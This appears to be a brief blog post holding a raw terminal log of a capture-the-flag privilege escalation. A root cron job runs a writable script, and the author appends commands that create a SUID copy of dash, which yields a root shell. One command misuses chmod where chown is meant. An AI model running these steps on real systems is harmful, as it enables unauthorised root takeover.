Tuesday, May 25, 2021

Crontab priv esca

 www-data@red:/etc$ ls -la cron*
ls -la cron*
-rw-r--r-- 1 root root  722 Apr  5  2016 crontab

cron.d:
total 32
drwxr-xr-x   2 root root  4096 Jun  3  2016 .
drwxr-xr-x 100 root root 12288 May 25 11:38 ..
-rw-r--r--   1 root root   102 Jun  3  2016 .placeholder
-rw-r--r--   1 root root    56 Jun  3  2016 logrotate
-rw-r--r--   1 root root   589 Jul 16  2014 mdadm
-rw-r--r--   1 root root   670 Mar  1  2016 php

cron.daily:
total 56
drwxr-xr-x   2 root root  4096 Jun  3  2016 .
drwxr-xr-x 100 root root 12288 May 25 11:38 ..
-rw-r--r--   1 root root   102 Apr  5  2016 .placeholder
-rwxr-xr-x   1 root root   539 Apr  5  2016 apache2
-rwxr-xr-x   1 root root   376 Mar 31  2016 apport
-rwxr-xr-x   1 root root   920 Apr  5  2016 apt-compat
-rwxr-xr-x   1 root root  1597 Nov 26  2015 dpkg
-rwxr-xr-x   1 root root   372 May  6  2015 logrotate
-rwxr-xr-x   1 root root   539 Jul 16  2014 mdadm
-rwxr-xr-x   1 root root   249 Nov 12  2015 passwd
-rwxr-xr-x   1 root root   383 Mar  8  2016 samba
-rwxr-xr-x   1 root root   214 Apr 12  2016 update-notifier-common

cron.hourly:
total 20
drwxr-xr-x   2 root root  4096 Jun  3  2016 .
drwxr-xr-x 100 root root 12288 May 25 11:38 ..
-rw-r--r--   1 root root   102 Apr  5  2016 .placeholder

cron.monthly:
total 20
drwxr-xr-x   2 root root  4096 Jun  3  2016 .
drwxr-xr-x 100 root root 12288 May 25 11:38 ..
-rw-r--r--   1 root root   102 Apr  5  2016 .placeholder

cron.weekly:
total 28
drwxr-xr-x   2 root root  4096 Jun  3  2016 .
drwxr-xr-x 100 root root 12288 May 25 11:38 ..
-rw-r--r--   1 root root   102 Apr  5  2016 .placeholder
-rwxr-xr-x   1 root root    86 Apr 13  2016 fstrim
-rwxr-xr-x   1 root root   211 Apr 12  2016 update-notifier-common
www-data@red:/etc$ cd cron.d    
cd cron.d
www-data@red:/etc/cron.d$ ls
ls
logrotate  mdadm  php
www-data@red:/etc/cron.d$ ls -la
ls -la
total 32
drwxr-xr-x   2 root root  4096 Jun  3  2016 .
drwxr-xr-x 100 root root 12288 May 25 11:38 ..
-rw-r--r--   1 root root   102 Jun  3  2016 .placeholder
-rw-r--r--   1 root root    56 Jun  3  2016 logrotate
-rw-r--r--   1 root root   589 Jul 16  2014 mdadm
-rw-r--r--   1 root root   670 Mar  1  2016 php
www-data@red:/etc/cron.d$ cd logrotate
cd logrotate
bash: cd: logrotate: Not a directory
www-data@red:/etc/cron.d$ cat logrotate
cat logrotate
*/5 *   * * *   root  /usr/local/sbin/cron-logrotate.sh
www-data@red:/etc/cron.d$ cat /usr/local/sbin/cron-logrotate.sh
cat /usr/local/sbin/cron-logrotate.sh
#Simon, you really need to-do something about this
www-data@red:/etc/cron.d$ cd ..
cd ..
www-data@red:/etc$ echo "cp /bin/dash /tmp/exploit; chmod u+s /tmp/exploit;chmod root:root /tmp/exploit">> /usr/local/sbin/cron-logrotate.sh
<d root:root /tmp/exploit">> /usr/local/sbin/cron-logrotate.sh               
www-data@red:/etc$ cat /usr/local/sbin/cron-logrotate.sh
cat /usr/local/sbin/cron-logrotate.sh
#Simon, you really need to-do something about this
cp /bin/dash /tmp/exploit; chmod u+s /tmp/exploit;chmod root:root /tmp/exploit
www-data@red:/etc$ cd
cd
bash: cd: HOME not set
www-data@red:/etc$ cd ..
cd ..
www-data@red:/$ /tmp/exploit -p
/tmp/exploit -p
# cd /root
cd /root
# ls
ls
fix-wordpress.sh  flag.txt  issue  python.sh  wordpress.sql

at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)